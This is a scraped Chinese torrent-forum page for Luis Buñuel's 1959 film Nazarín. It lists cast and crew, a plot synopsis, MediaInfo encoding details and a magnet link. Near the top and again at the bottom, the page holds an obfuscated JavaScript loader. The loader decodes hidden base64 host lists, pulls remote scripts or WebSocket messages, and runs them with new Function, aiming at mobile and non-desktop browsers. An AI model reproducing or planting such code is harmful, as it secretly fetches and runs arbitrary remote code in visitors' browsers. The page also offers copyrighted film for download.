纳萨林[简繁字幕].Nazarin.1959.1080p.BluRay.x265.10bit.FLAC.2.0.MNHD 3.93GB

版主小s 1月前 119

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 纳萨林 / 娜塞琳(台) / 纳扎林 / Nazarin

◎片 名 Nazarín

◎年 代 1959

◎产 地 墨西哥

◎类 别 剧情

◎语 言 西班牙语

◎上映日期 1959-06-04(墨西哥)

◎IMDb链接 https://www.imdb.com/title/tt0051983/

◎豆瓣评分 7.7/10 (618人评价)

◎豆瓣链接 https://movie.douban.com/subject/1303560/

◎片 长 94分钟

◎导 演 路易斯·布努埃尔 Luis Bu?uel (id:1032095)

◎编 剧 路易斯·布努埃尔 Luis Bu?uel (id:1032095)

胡里奥·阿雷罕德罗 Julio Alejandro (id:1276961)

Emilio Carballido Emilio Carballido (id:1020469)

贝尼托·佩雷斯·加尔多斯 Benito Pérez Galdós (id:1145299)

◎演 员 弗朗西斯科·拉瓦尔 Francisco Rabal (id:1032637)

玛格·洛佩兹 Marga López (id:1118978)

丽塔·马塞多 Rita Macedo (id:1037663)

Noé Murayama Noé Murayama (id:1134319)

David Reynoso David Reynoso (id:1137499)

路易斯·阿瑟维斯·卡斯坦尼达 Luis Aceves Casta?eda (id:1276785)

Manuel Arvide Manuel Arvide (id:1277484)

Pilar Pellicer Pilar Pellicer (id:1131054)

伊格纳西奥·洛佩斯·塔尔索 Ignacio López Tarso (id:1123688)

埃达·卡拉斯科 Ada Carrasco (id:1050914)

Edmundo Barbero Edmundo Barbero (id:1064488)

Victorio Blanco Victorio Blanco (id:1066717)

何塞·查韦斯 José Chávez (id:1076829)

Ofelia Guilmáin Ofelia Guilmáin (id:1101962)

Aurora Molina Aurora Molina (id:1117588)

罗森达·蒙特罗斯 Rosenda Monteros (id:1117943)

Jesús Fernández Jesús Fernández (id:1447389)

曼努埃尔·巴巴恰诺·庞斯 Manuel Barbachano Ponce (id:1277854)

Rodolfo Halffter Rodolfo Halffter (id:1029815)

盖布瑞·费加洛 Gabriel Figueroa (id:1048488)

Carlos Savage Carlos Savage (id:1296758)

Edward Fitzgerald Edward Fitzgerald (id:1283804)

◎标 签 墨西哥 / 宗教 / 布努艾尔 / 西班牙 / 路易斯·布努艾尔 / 路易斯·布努埃尔 / 1950s / LuisBu?uel

◎简 介

纳萨林(弗朗西斯科?拉瓦尔 Francisco Rabal 饰)是一名将自己的全部都奉献给了上帝的神父,他放弃了教堂里优渥的条件,心甘情愿的前往环境十分糟糕的偏僻村庄布道。然而,纳萨林的虔诚却并没有换来应有的尊敬,因为帮助了犯下了谋杀罪行的妓女安达拉(Rita Macedo 饰),纳萨林遭到了信徒的唾弃和教会的驱逐。

然而,纳萨林并没有放弃信仰。安达拉的好友比阿特里兹(玛格?洛佩兹 Marga López 饰)的姐姐的孩子身患重病,请求纳萨林的祝福,奇迹发生了,孩子的疾病竟然神奇的痊愈了。就这样,安达拉和比阿特里兹成为了纳萨林的信徒。比阿特里兹的前男友平托(Noé Murayama 饰)十分嫉妒纳萨林,对他进行了无情的污蔑和中伤。

◎获奖情况 (共2项)

第12届戛纳电影节 (1959)

主竞赛单元 金棕榈奖(提名)

└──路易斯·布努埃尔 (id:1032095)

国际奖

└──路易斯·布努埃尔 (id:1032095)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 155715264289362694922091600924755013599 (0x7525AB45812BA12F458B01F83B06AFDF)

  4. Complete name : [email protected]COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.93 GiB

  8. Duration : 1 h 34 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 5 940 kb/s

  11. Movie name : [email protected]COM

  12. Encoded date : UTC 2021-09-13 14:33:52

  13. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  14. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 34 min

  22. Bit rate : 5 643 kb/s

  23. Width : 1 476 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 4:3

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.147

  32. Stream size : 3.73 GiB (95%)

  33. Writing library : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=11 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1476x1080 / interlace=0 / total-frames=136439 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=21.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : FLAC

  44. Format/Info : Free Lossless Audio Codec

  45. Codec ID : A_FLAC

  46. Duration : 1 h 34 min

  47. Bit rate mode : Variable

  48. Bit rate : 290 kb/s

  49. Channel(s) : 2 channels

  50. Channel layout : L R

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 11.719 FPS (4096 SPF)

  53. Bit depth : 16 bits

  54. Compression mode : Lossless

  55. Stream size : 196 MiB (5%)

  56. Title : Spanish

  57. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  58. Language : Spanish

  59. Default : Yes

  60. Forced : No


  61. Text #1

  62. ID : 3

  63. Format : UTF-8

  64. Codec ID : S_TEXT/UTF8

  65. Codec ID/Info : UTF-8 Plain Text

  66. Duration : 1 h 33 min

  67. Bit rate : 57 b/s

  68. Count of elements : 1309

  69. Stream size : 39.1 KiB (0%)

  70. Title : Chinese (Simplified)

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : UTF-8

  77. Codec ID : S_TEXT/UTF8

  78. Codec ID/Info : UTF-8 Plain Text

  79. Duration : 1 h 33 min

  80. Bit rate : 57 b/s

  81. Count of elements : 1309

  82. Stream size : 39.1 KiB (0%)

  83. Title : Chinese (Traditional)

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Text #3

  88. ID : 5

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 33 min

  94. Bit rate : 16.8 kb/s

  95. Count of elements : 3050

  96. Stream size : 11.2 MiB (0%)

  97. Title : English

  98. Language : English

  99. Default : No

  100. Forced : No


  101. Menu

  102. 00:00:00.000 : en:Chapter 01

  103. 00:09:58.333 : en:Chapter 02

  104. 00:17:18.375 : en:Chapter 03

  105. 00:22:51.916 : en:Chapter 04

  106. 00:28:43.708 : en:Chapter 05

  107. 00:37:28.583 : en:Chapter 06

  108. 00:45:53.875 : en:Chapter 07

  109. 00:54:45.541 : en:Chapter 08

  110. 01:01:34.333 : en:Chapter 09

  111. 01:12:05.333 : en:Chapter 10

  112. 01:18:46.791 : en:Chapter 11

  113. 01:29:11.458 : en:Chapter 12


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:3C33BFC2310D5537BD3898E9C993EF0038A28194

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};